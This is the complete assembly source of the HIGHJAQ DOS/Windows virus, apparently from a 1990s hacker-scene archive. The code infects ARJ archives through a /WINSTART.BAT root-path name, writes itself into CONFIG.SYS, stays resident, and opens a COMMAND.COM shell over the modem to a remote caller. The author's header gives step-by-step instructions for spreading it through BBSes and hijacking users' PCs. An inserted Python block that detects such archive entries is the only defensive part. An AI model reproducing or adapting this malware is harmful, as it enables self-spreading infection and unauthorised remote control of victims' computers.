Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CCTX0198.ZIP / QMUPDAT7.ZIP / HIGHJAQ.ASM
Assembly Source File | 1996-06-17 | 22KB | 758 lines
Comment $
HIGHJAQ Virus
This virus exploits several security bugs of the IBM PC environment to give
a hacker full access to your PC with a modem.
Two old assumptions are now incorrect:
1. No one can gain access to my PC through my modem without modem software
running; this is now false.
2. If I download software from a BBS but don't run it, I can't get a virus;
this is now also false.
The bugs that this virus exploits are:
1. The Switch character "/" used instead of "\".
2. Windows' automatic execution of WINSTART.BAT file.
3. Execution of Non-*.COM and Non-*.EXE files in the CONFIG.SYS file.
4. Having a Modem connected to a phone line.
5. COMMAND.COM redirectability.
Here's how it works:
An infected *.ARJ file contains the file /WINSTART.BAT. When this *.ARJ file
is extracted into a directory to be scanned by a BBS, the /WINSTART.BAT file
does not go into the desired directory but into the root directory.
The first bug has been exploited.
If the owner of the BBS ever stops the BBS and starts Windows, the file
WINSTART.BAT in the root directory can get executed. When activated, this
file scans the drive of the PC for more *.ARJ files and adds its
/WINSTART.BAT to them. At the same time, the /WINSTART.BAT adds a new line
to C:\CONFIG.SYS that looks like this: INSTALLHIGH=C:\AKBM5IVC.1HN
(the name is random and does not have an .EXE or .COM extension, so virus
scanners don't scan it by default). The /WINSTART.BAT then erases itself.
The second bug has been exploited.
This new file named in C:\CONFIG.SYS becomes resident (272 bytes) the next
time the PC reboots. The third bug has been exploited.
After the HIGHJAQ virus goes memory resident from the C:\CONFIG.SYS file, it
constantly scans the COM ports for modems. The hacker then calls the phone
number that the modem is attached to at least once every minute for three
consecutive minutes, lets it ring once or twice, and hangs up.
The virus sees this as a request to gain access to the PC. If this happens,
the virus reboots the system, reactivates HIGHJAQ from C:\CONFIG.SYS, answers
the modem and connects the hacker to a COMMAND.COM prompt on C:\>. The fourth
and fifth bugs have been exploited and the PC is wide open to attack.
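A defender's check, added here and not part of the HIGHJAQ source: a Python walker over ARJ basic headers (the same layout as the header template at the end of the listing) that flags entries whose name begins with a path separator, contains "..", or carries a drive letter, which is how a /WINSTART.BAT entry escapes the extraction directory. The sample archive is constructed inside the block with a harmless stored payload; walk_arj, suspicious_entries and build_header are names chosen here, not ARJ or virus code.

```python
import struct
import zlib
ARJ_MAGIC = b"\x60\xea"    # header id bytes (60h,0EAh in the listing above)
FTYPE_MAIN = 2             # file type 2 = the archive's main header, no data

def walk_arj(data):
    """Yield (name, file_type, csize, header_crc_ok) for every basic header."""
    pos = 0
    while data[pos:pos + 2] == ARJ_MAGIC:
        (bhsize,) = struct.unpack_from("<H", data, pos + 2)
        if bhsize == 0:                    # basic header size 0 = end of archive
            return
        hdr = data[pos + 4:pos + 4 + bhsize]
        (stored_crc,) = struct.unpack_from("<I", data, pos + 4 + bhsize)
        first_hdr_size, ftype = hdr[0], hdr[6]
        csize = struct.unpack_from("<I", hdr, 12)[0]
        name = hdr[first_hdr_size:hdr.index(b"\0", first_hdr_size)].decode("latin-1")
        yield name, ftype, csize, zlib.crc32(hdr) == stored_crc
        pos += 4 + bhsize + 4              # id, size word, header, header CRC
        while True:                        # skip extended headers, if any
            (ehsize,) = struct.unpack_from("<H", data, pos)
            pos += 2
            if ehsize == 0:
                break
            pos += ehsize + 4
        if ftype != FTYPE_MAIN:            # stored/compressed data follows
            pos += csize
    raise ValueError("bad ARJ header id at offset %#x" % pos)

def suspicious_entries(data):
    """Entry names an extractor would write outside the target directory."""
    bad = []
    for name, ftype, _csize, _crc_ok in walk_arj(data):
        parts = name.replace("\\", "/").split("/")
        if ftype != FTYPE_MAIN and (name[:1] in ("/", "\\") or ".." in parts or ":" in name):
            bad.append(name)
    return bad

def build_header(ftype, name, payload=b""):   # constructed fixture, stored method 0
    body = struct.pack("<8B4I3H", 30, 6, 1, 0, 0, 0, ftype, 0,
                       0, len(payload), len(payload), zlib.crc32(payload), 0, 0, 0)
    body += name.encode("latin-1") + b"\0\0"           # name, empty comment
    return (ARJ_MAGIC + struct.pack("<H", len(body)) + body
            + struct.pack("<I", zlib.crc32(body)) + b"\0\0" + payload)

# Constructed sample: a harmless text entry plus one named with the switch character.
SAMPLE = (build_header(FTYPE_MAIN, "SAMPLE.ARJ")
          + build_header(0, "README.TXT", b"harmless stored text")
          + build_header(0, "/WINSTART.BAT", b"@echo constructed sample\r\n")
          + ARJ_MAGIC + b"\0\0")                        # end-of-archive marker
```

The header CRC flag lets a scanner also reject archives whose headers were patched by hand, and the check generalizes beyond the leading "/" to ".." components and drive-letter names.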
Hackers, here is what to do:
1. Move the WINSTART.BAT file that is in your root directory to A:
2. Put an *.ARJ file that you wish to infect on Drive A:
3. A:
4. WINSTART
5. Edit C:\CONFIG.SYS and remove the last line INSTALLHIGH=C:\????????.???.
6. Call your favorite BBS that runs a Virus Scan on uploaded files.
7. Upload the *.ARJ file created in steps 1-4.
8. Let the BBS Scan it for viruses.
9. Hang-up.
10. Wait for several days, weeks etc.
11. Call the same BBS.
12. Download a different *.ARJ file.
13. See if the *.ARJ file has /WINSTART.BAT; if so, the BBS ran Windows
and infected all its *.ARJ files. If not, go to step 10.
14. Call the BBS and connect but then hang-up.
15. Repeat step 14 for 3 minutes.
16. Call BBS again (should take longer to answer because machine rebooted).
17. You should now have a C:\> prompt and HIGHJAQ will have identified which
COM port and baud rate you are connected on.
18. Use DEBUG scripts to create any program you want like LAPLINK.
19. EDLIN the AUTOEXEC.BAT to run LAPLINK in Modem mode.
20. Disconnect and call back and have LAPLINK answer.
21. Happy hacking.
Even better:
18. Be familiar with the BBS software and get the log files that show the
users and their home phone numbers, maybe even a log of what they
downloaded.
19. If the users downloaded an infected *.ARJ file they also have the HIGHJAQ
virus on their PC.
20. Repeat steps 14-21 on the users' phones (just call and let it ring once or
twice and hang up for 3 minutes).
Even even better:
1. Have your own BBS.
2. Infect all the *.ARJ files by running /WINSTART.BAT on your BBS.
3. Let people download infected *.ARJ software.
4. Wait for several days, weeks etc.
5. Call their PC's and gain access to them.
Experiment with the software and get to know how it works. Feel free to
share it with any BBS of your choice.
"Q" the Misanthrope
P.S. Works in Windows 95.
tasm highjaq
tlink /t highjaq
copy highjaq.com winstart.bat
winstart
$
page
qseg segment para public 'code'
simple proc far
assume cs:qseg,es:qseg,ds:qseg
VIDEO_DISABLE_BIT equ 20h
VGA_REG equ 3C4h
org 0100h
begin: db "::" ;label used for .com portion
jo nextjmp
jno nextjmp
db 0dh,0ah
db "@ctty nul",0dh,0ah ;hide activities
db "copy/b %0.bat+%0 c:\q.com",0dh,0ah
db "dir \*.arj/s/b|c:\q.com/i",0dh,0ah
db ":" ;infect all .ARJ files
nextjmp: jno nextjmp1
jo nextjmp1
db 0dh,0ah ;if already resident don't
db "if errorlevel 1 goto " ;infect config.sys again
jno $+(comcode-nextjmp1)
jo $+(comcode-nextjmp2)
db 0dh,0ah
db "ren c:\q.com " ;rename com program randomly
fname1 db "ABCDEFGH.IJK",0dh,0ah
db "echo INSTALLHIGH=C:\" ;infect config.sys
fname2 db "ABCDEFGH.IJK>>c:\config.sys",0dh,0ah
db ":"
nextjmp1: jno comcode ;windows 95 runs winstart.bat
nextjmp2: jo comcode ;while windows runs winstart
db 0dh,0ah
db "for %%a in (%0 %0.bat) do if exist %%a set q=%%a",0dh,0ah
db "del c:\q.com",0dh,0ah
db "ctty con",0dh,0ah
db "@del %q%",1ah ;delete batch file
comcode: mov bx,0003h ;see if this is from bat or
cmp byte ptr ds:[bx+80h-03h],bh
jne piped ;from the config.sys line
jmp notpiped
stopit: mov ax,0fefeh ;mem residency check
mov bx,ax
int 21h
mov ax,4c00h ;exit program
cmp si,1994h
je isres
push ax
mov ah,30h
int 21h
cmp al,05h ;don't infect config if less
pop ax ;than dos 5.0
jae notres
isres: inc al
notres: int 21h
piped: push cs
pop ds
push cs
pop es
mov di,offset inputbuf ;*.ARJ file name from pipe
push di
cld
getnextpipedch: mov ah,0bh ;check for more piped input
int 21h
or al,al
jz stopit
mov ah,06h ;get that piped char
mov dl,0ffh
int 21h
cmp al,0ah ;throw away linefeed
je getnextpipedch
cmp al,0dh ;null terminated carriage return
jne storeit
xor ax,ax
storeit: stosb
jnz getnextpipedch ;if not null get next char
mov cx,11
mov di,offset fname1
setname: xor ax,ax ;create random file name
out 43h,al
push cx
in al,40h
mov cx,ax
around: loop around ;pseudo random delay
pop cx
and al,1fh ;32 letters possible
add al,'A'
cmp al,'Z'
jbe nameit
sub al,42 ;if above Z then make it 1-6
nameit: stosb ;save random name
mov byte ptr ds:[fname2-fname1+di-01h],al
cmp cl,04h ;step over the .
jne incloop
inc di
incloop: in al,40h ;get the high byte
loop setname
pop dx ;point to file name
mov ax,3d02h
int 21h
jc piped
xchg ax,bx
mov ax,5700h ;get file date
push ax
int 21h
push cx
push dx
and cx,1fh ;see if date seconds=0
jz infected ;if so don't infect
call infectarj ;else infect it
infected: pop dx
pop cx
pop ax
inc ax
and cl,0e0h ;set seconds=0
int 21h
mov ah,3eh ;close and go to next file
int 21h
jmp piped
vname db 0dh,0ah,'HIGHJAQ on COM';virus name and com port
portasc db '1:38400,N,8,1',0dh,0ah
command db 'C:\COMMAND.COM',0 ;command interpreter
comtail db exectab-param-1
param db ' C:\ COM' ;with redirect line
ascport db '1 /E:1024/P/F',0dh
exectab dw 0,comtail,0,5ch,0,6ch,0
mstring db 'ATL0M0A',0dh,0ah ;answer modem quietly
mend label byte
notpiped: mov ax,ds ;executed from config.sys
dec ax
mov ds,ax
xor cx,cx ;misidentify program as IO
mov word ptr ds:[bx-03h+08h],'OI'
mov word ptr ds:[bx-03h+0ah],cx
mov ds,word ptr ds:[bx-03h+2ch+10h]
findname: inc bx ;find program name
cmp word ptr ds:[bx-04h],cx
jne findname
mov dx,bx
mov ax,4301h ;and set it to system and r/o
mov cl,05h
int 21h
push ds
pop es
mov ah,49h ;clear environment space
int 21h
mov bx,0040h ;examine comports
xor di,di
mov ds,bx
loopcom: mov dx,word ptr ds:[bx+di-40h]
or dx,dx
jz gores
inc bx
inc di
cmp bl,44h
je gores
add dl,07h ;3ffh scratchpad reg used
in al,dx ;to determine if necessary to
cmp al,'Q' ;answer modem and allow hacker
je foundq
dec dx
in al,dx
and al,30h ;dsr cts on?
cmp al,30h ;simple modem test
jne loopcom
mov word ptr cs:[bx+di+modems-42h],dx
jmp short loopcom
foundq: xor ax,ax ;86 'Q' in the scratchpad reg
out dx,al
push cs
pop ds
dec dx ;3feh
mov word ptr ds:[port],dx ;for monitoring hangup later
dec di ;di=com? number -1
add word ptr ds:[portasc],di
add word ptr ds:[ascport],di
jmp runcommand ;goto answering the modem
gores: push cs
pop ds
mov ax,3521h ;if normal residency get
int 21h ;interrupts
mov word ptr ds:[prev21],bx
mov word ptr ds:[prev21+2],es
mov ax,3508h
int 21h
mov word ptr ds:[prev8],bx
mov word ptr ds:[prev8+2],es
mov cx,(offset endrescode)-(offset rescode)
mov di,40h ;now move code down to 40h
mov si,offset rescode ;to save residency space
push cs
pop es
rep movsb
mov dx,(offset new8)-(offset rescode)+40h
mov ax,2508h ;set interrupts
int 21h
mov dx,(offset new21)-(offset rescode)+40h
mov ax,2521h
int 21h
lea dx,word ptr ds:[di+0eh]
mov cl,04h
shr dx,cl
mov ax,3100h ;go resident
int 21h
rescode label byte
modems dw 0,0,0,0 ;modem ports to monitor
ringcnt dw 0,0,0,0 ;if they rang in last minute
ring3 dw 2,2,2,2 ;count down timer
onemin dw 1091 ;one minute of timer ticks
new21: pushf
cmp ax,0fefeh ;for residency test
jne testchmod
cmp ax,bx
jne testchmod
mov si,1994h
testchmod: cmp ax,4300h
jne onward
push bx
mov bx,dx
cmp word ptr ds:[bx],'W/' ;allow ARJ.EXE to overwrite
pop bx ;/WINSTART.BAT files
jne onward
popf
stc
mov ax,0002h ;indicate file not found
retf 02h
onward: popf
jmp21: db 0eah
prev21 dd 0
setreboot: mov dx,word ptr ds:[bx+modems-rescode+40h]
inc dx ;reboot pc and allow hacker in
mov al,'Q' ;scratchpad reg rides through
out dx,al ;reset without changing value
reboot: xor cx,cx
poundreset: sti ;pound on the reset switch
mov al,0feh ;several thousand times
out 64h,al ;this will reboot windows etc.
loop poundreset
db 0eah ;all else fails goto f000:fff0
dd 0f000fff0h
new8: pushf
sti
push ax
push bx
push dx
push ds
push cs
pop ds
mov bx,0001h ;prime vm 1 if not in windows
mov ax,1683h
int 2fh
dec bx ;vm 1 in windows only
jnz donecom1
dec word ptr ds:[bx+onemin-rescode+40h]
jns nextcom1 ;check for minute mark
mov word ptr ds:[bx+onemin-rescode+40h],1091
nexttest: cmp byte ptr ds:[bx+ringcnt-rescode+40h],00h
je setring3 ;check to see if phone rang
mov byte ptr ds:[bx+ringcnt-rescode+40h],00h
dec byte ptr ds:[bx+ring3-rescode+40h]
js setreboot ;for 3 minutes, if so reboot
jmp short incbx
setring3: mov byte ptr ds:[bx+ring3-rescode+40h],02h
incbx: inc bx ;check next modem port
inc bx
cmp bl,08h
jb nexttest
jmp short donecom1
nextcom1: mov dx,word ptr ds:[bx+modems-rescode+40h]
or dx,dx ;get modem port
jz loopcom1
in al,dx
test al,44h ;test for ring or delta ring
jz loopcom1 ;if so indicate it rang
mov byte ptr ds:[bx+ringcnt-rescode+40h],01h
loopcom1: inc bx
inc bx
cmp bl,08h
jb nextcom1
donecom1: pop ds
pop dx
pop bx
pop ax
popf
db 0eah
prev8 dd 0
endrescode label byte
reboot8:
pushf
push ax
push bx
push dx
push ds
mov dx,03feh ;get port to monitor hangup
port equ $-2
in al,dx
test al,80h
jnz donecom1
gotoreboot: jmp reboot
runcommand: push cs
pop es
mov ah,0fh
int 10h
cbw
int 10h
sub dl,03h ;3fb
mov al,80h
out dx,al
sub dl,03h ;3f8
mov ax,03h
out dx,ax
add dx,ax ;3fb
out dx,al
inc dx ;3fc
out dx,al
inc dx ;3fd
inc dx ;3fe for 38400,N,8,1
push dx
mov dx,VGA_REG ;disable vga display
mov al,1 ;stolen from Ralf Brown
out dx,al
inc dx
in al,dx
dec dx
mov ah,VIDEO_DISABLE_BIT
and al,not VIDEO_DISABLE_BIT
or ah,al
mov al,1
out dx,al
inc dx
mov al,ah
out dx,al
pop dx
in al,21h ;disable keyboard
or al,02h
out 21h,al
mov bl,40h
mov ds,bx
mov cx,word ptr ds:[bx+6ch-40h]
add cx,5460 ;wait 5 minutes for hacker
retryring: push cx ;to call modem
sub cx,word ptr ds:[bx+6ch-40h]
pop cx
js gotoreboot
in al,dx
test al,40h ;check for ring
jz retryring
xchg dx,di ;output ATA string
cld
mov si,offset mstring
mov cx,word ptr((offset mend)-(offset mstring))
output_data: lods byte ptr cs:[si]
mov ah,01h
int 14h
loop output_data
xchg dx,di
mov cx,word ptr ds:[bx+6ch-40h]
add cx,1092 ;wait 1 minute for carrier
retrycd: push cx
sub cx,word ptr ds:[bx+6ch-40h]
pop cx
js gotoreboot
in al,dx
test al,80h
jz retrycd
mov ax,word ptr ds:[bx+6ch-40h]
add ax,55 ;wait 3 seconds to identify
wait3sec: push ax ;ourselves and com port
sub ax,word ptr ds:[bx+6ch-40h]
pop ax
jns wait3sec
push cs
pop ds
xchg dx,di
mov si,offset vname ;tell hacker which com port
mov cx,word ptr((offset command)-(offset vname))
output_data2: lods byte ptr ds:[si]
mov ah,01h
int 14h
loop output_data2
mov ax,3508h ;set up monitor for hanging up
int 21h
mov word ptr ds:[prev8],bx
mov word ptr ds:[prev8+2],es
mov dx,offset reboot8
mov ax,2508h
int 21h
push cs
pop es
mov bx,offset rend+0fh ;de-allocate space
mov cl,04h
shr bx,cl
mov ah,4ah
int 21h
mov dx,offset command ;run command.com
mov bx,offset exectab
mov word ptr ds:[bx+04h],ds
mov word ptr ds:[bx+08h],ds
mov word ptr ds:[bx+0ch],ds
mov ax,4b00h
int 21h
jmp reboot
;stolen from arjdrop in VLAD April Fools issue with only a couple of changes
infectarj proc near
;on entry bx=file handle
push ds
push es
push cs
pop ds
push cs
pop es
mov ax,4202h
xor cx,cx
cwd
int 21h
sub ax,4
sbb dx,0
mov cx,dx
mov dx,ax
mov ax,4200h
int 21h
mov word ptr csize,offset rend - 100h
mov word ptr osize,offset rend - 100h
mov cx,offset rend - 100h
mov si,100h ;start of program in memory
call crc32
cld
mov si,offset marker
mov di,offset sparebuff
mov cx,offset rend - offset marker
rep movsb
mov word ptr crc,ax
mov word ptr crc+2,dx
mov cx,word ptr bhsize
mov si,offset fhsize
call crc32
mov word ptr acrc,ax
mov word ptr acrc+2,dx
mov ah,40h
mov cx,offset fdata - offset marker
mov dx,offset marker
int 21h
mov ah,40h
mov cx,offset marker - 100h
mov dx,100h
int 21h
mov ah,40h
mov cx,offset rend - offset marker
mov dx,offset sparebuff
int 21h
mov ah,40h
mov cx,4
mov dx,offset fdend
int 21h
pop es
pop ds
ret
infectarj endp
crc32 proc near
;on entry cx=number of bytes to checksum
; si=pointer to bytes
;on exit dx:ax contains the checksum
;I stole this code from some PD sources I got off a BBS.
push bx
push cx
push si
push di
call gentable
mov dx,-1
mov ax,-1
crc32loop:
xor bx,bx
mov bl,byte ptr [si]
inc si
xor bl,al
shl bx,1
shl bx,1
mov al,ah
mov ah,dl
mov dl,dh
xor dh,dh
xor ax,word ptr [bx+crc32tab]
xor dx,word ptr [bx+crc32tab+2]
dec cx
jnz crc32loop
pop di
pop si
pop cx
pop bx
xor dx,-1
xor ax,-1
ret
crc32 endp
Gentable proc near
;Generates the 32bit crc table. Thanks to "Necrosoft Enterprises" who had
;this code inside their Dementia Virus. I have plenty of other code to do
;this, but it is all much, much bigger.
push ax
push cx
push dx
push di
mov di,offset crc32tab
xor cx,cx
outgen:
xor dx,dx
xor ax,ax
mov al,cl
push cx
mov cx,8
calcloop:
clc
rcr dx,1
rcr ax,1
jnc nocrcxor
xor dx,0edb8h
xor ax,8320h
nocrcxor:
loop calcloop
mov word ptr [di],ax
mov word ptr [di+2],dx
add di,4
pop cx
inc cx
cmp cx,100h
jne outgen
pop di
pop dx
pop cx
pop ax
ret
Gentable endp
rbuff:
marker db 60h,0eah
bhsize dw offset acrc - offset fhsize
fhsize db offset aname - offset fhsize
anum db 6
anum2 db 1
osver db 0
aflag db 0
ameth db 0 ;stored
aftype db 0 ;binary
ares db 0
dtm dd 20df33e0h ;06/31/96 06:31:00 my birthday
csize dd 4 ;compressed size
osize dd 4 ;original size
crc dd 0
fspec dw 0
faccess dw 0
hstdata dw 0
aname db "/WINSTART.BAT",0 ;Switch Character for Root Dir
acomm db 0
acrc dd 0
ehsize dw 0
fdata db "!"
fdend:
db 60h,0eah,0,0
rend:
crc32tab db 100h*4 dup (0)
sparebuff:
inputbuf label byte ;piped file name of *.ARJ file
endcode label byte
simple endp
qseg ends
end begin